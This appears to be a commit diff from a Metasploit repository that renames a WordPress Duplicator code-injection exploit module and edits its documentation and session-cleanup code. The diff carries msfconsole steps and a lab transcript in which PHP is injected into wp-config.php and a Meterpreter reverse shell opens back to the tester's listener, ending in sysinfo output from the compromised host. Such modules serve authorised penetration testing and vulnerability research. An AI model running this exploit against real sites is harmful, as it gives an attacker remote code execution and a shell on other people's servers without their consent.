renamed module and doc
parent
7e953e34b9
commit
b82e3469a2
|
@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
|
|||
|
||||
Confirm that functionality works:
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/multi/php/wordpress_duplicator`
|
||||
2. `use exploit/multi/php/wp_duplicator_code_inject`
|
||||
3. Set the `RHOST`.
|
||||
4. Confirm the target is vulnerable: `check`
|
||||
5. Confirm that the target is vulnerable: `The target is vulnerable.`
|
||||
|
@ -44,26 +44,29 @@ The path to the installer.php file to exploit By default, the path is `/installe
|
|||
### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/php/wordpress_duplicator
|
||||
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
|
||||
RHOSTS => 192.168.56.101
|
||||
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
|
||||
LHOST => 192.168.56.1
|
||||
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
|
||||
TARGETURI => /installer_vuln.php
|
||||
msf5 exploit(multi/php/wordpress_duplicator) > run
|
||||
msf5 > use exploit/multi/php/wp_duplicator_code_inject
|
||||
msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247
|
||||
rhosts => 192.168.37.247
|
||||
msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php
|
||||
targeturi => /wordpress/installer.php
|
||||
msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/php/wp_duplicator_code_inject) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Checking if the wp-config.php file already exists...
|
||||
[*] This WordPress was not restored. Creating the wp-config.php file...
|
||||
[*] Successfully created the wp-config.php file!
|
||||
[*] All good! Injecting PHP code in the wp-config.php file...
|
||||
[*] Requesting wp-config.php to execute the payload...
|
||||
[*] Sending stage (37775 bytes) to 1.1.1.1
|
||||
[*] Sending stage (38247 bytes) to 192.168.37.247
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600
|
||||
[*] Attempting to recreate wp-config file...
|
||||
[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip
|
||||
[*] Successfully created the wp-config.php file!
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : debian
|
||||
OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
|
||||
Meterpreter : php/linux
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-0FAJA14JLP4
|
||||
OS : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586
|
||||
Meterpreter : php/windows
|
||||
meterpreter >
|
||||
```
|
||||
|
|
@ -143,12 +143,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type.eql? 'meterpreter'
|
||||
client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
|
||||
client.fs.file.rm 'wp-config.php'
|
||||
if client.type.eql?('meterpreter')
|
||||
client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
|
||||
client.fs.file.rm('wp-config.php')
|
||||
else
|
||||
client.shell_command_token 'rm wp-config.php'
|
||||
client.shell_command_token('rm wp-config.php')
|
||||
end
|
||||
print_status("Attempting to recreate wp-config file...")
|
||||
create_wp_config_file
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue